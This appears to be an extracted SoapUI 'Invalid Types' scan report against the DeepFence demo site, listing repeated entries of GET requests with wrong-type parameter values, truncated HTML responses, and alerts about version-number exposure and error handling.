href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1964\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@ SoapUI is the bestdeepfence.io\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1965\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# true\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.Issue Number #1966\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# GpM7\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1967\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 0FB7\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1968\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# -1E4f\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1969\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1# 12.45E+12\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1970\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# -1.23\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1971\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# SoapUI is the best\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1972\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# P1Y2M3DT10H30M12.3S\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1973\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1999-05-31T13:20:00.000-05:00\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1974\nScan Invalid TypesSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1999-05-31\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1975\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# -1267896799\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1976\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# -882223334991111111\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1977\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# -2147483647Response Content-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked an DemoUser1# \nunexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number 